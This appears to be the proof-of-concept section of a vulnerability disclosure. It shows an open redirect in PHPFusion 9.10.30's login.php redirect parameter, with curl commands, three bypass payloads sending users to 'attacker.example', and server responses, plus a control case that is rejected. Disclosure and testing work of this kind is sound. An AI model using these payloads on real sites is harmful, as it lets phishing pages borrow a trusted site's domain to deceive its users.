### PoC 1: protocol-relative payload (guest, no cookies)
# curl -s -o NUL -D - "http://localhost/php-fusion/login.php?error=1&redirect=%2F%2Fattacker.example%2Fphish"
HTTP/1.1 302 Found
Date: Fri, 17 Jul 2026 21:29:36 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHPFusion 9.10.30
Set-Cookie: fusiona5ty5_session=pul1ck30u44lfsg8adgn4cu733; expires=Sun, 19 Jul 2026 21:29:36 GMT; Max-Age=172800; path=/
Set-Cookie: fusiona5ty5_visited=yes; expires=Sat, 17 Jul 2027 21:29:36 GMT; Max-Age=31536000; path=/; SameSite=lax
Set-Cookie: fusiona5ty5_lastvisit=1784320176; expires=Fri, 17 Jul 2026 22:29:36 GMT; Max-Age=3600; path=/php-fusion/; HttpOnly; SameSite=lax
Location: //attacker.example/phish
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=UTF-8


### PoC 2: /%2F variant
# curl -s -o NUL -D - "http://localhost/php-fusion/login.php?error=1&redirect=/%2Fattacker.example"
HTTP/1.1 302 Found
Date: Fri, 17 Jul 2026 21:29:36 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHPFusion 9.10.30
Set-Cookie: fusiona5ty5_session=0dsg2tmsfd3rs907geq0cvk2ce; expires=Sun, 19 Jul 2026 21:29:36 GMT; Max-Age=172800; path=/
Set-Cookie: fusiona5ty5_visited=yes; expires=Sat, 17 Jul 2027 21:29:36 GMT; Max-Age=31536000; path=/; SameSite=lax
Set-Cookie: fusiona5ty5_lastvisit=1784320176; expires=Fri, 17 Jul 2026 22:29:36 GMT; Max-Age=3600; path=/php-fusion/; HttpOnly; SameSite=lax
Location: //attacker.example
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=UTF-8


### PoC 3: /\ backslash variant
# curl -s -o NUL -D - "http://localhost/php-fusion/login.php?error=1&redirect=/%5Cattacker.example"
HTTP/1.1 302 Found
Date: Fri, 17 Jul 2026 21:29:36 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHPFusion 9.10.30
Set-Cookie: fusiona5ty5_session=m7995edgkbp3aog70107pubgjg; expires=Sun, 19 Jul 2026 21:29:36 GMT; Max-Age=172800; path=/
Set-Cookie: fusiona5ty5_visited=yes; expires=Sat, 17 Jul 2027 21:29:36 GMT; Max-Age=31536000; path=/; SameSite=lax
Set-Cookie: fusiona5ty5_lastvisit=1784320176; expires=Fri, 17 Jul 2026 22:29:36 GMT; Max-Age=3600; path=/php-fusion/; HttpOnly; SameSite=lax
Location: /\attacker.example
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=UTF-8


### CONTROL: absolute https URL is rejected (does not start with a single '/')
# curl -s -o NUL -D - "http://localhost/php-fusion/login.php?error=1&redirect=https://attacker.example"
HTTP/1.1 302 Found
Date: Fri, 17 Jul 2026 21:29:36 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHPFusion 9.10.30
Set-Cookie: fusiona5ty5_session=tsa326opldsp7s2srqgjmuvbmf; expires=Sun, 19 Jul 2026 21:29:36 GMT; Max-Age=172800; path=/
Location: http://localhost/php-fusion/php-fusion/login.php?error=1&redirect=https:/attacker.example
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=UTF-8

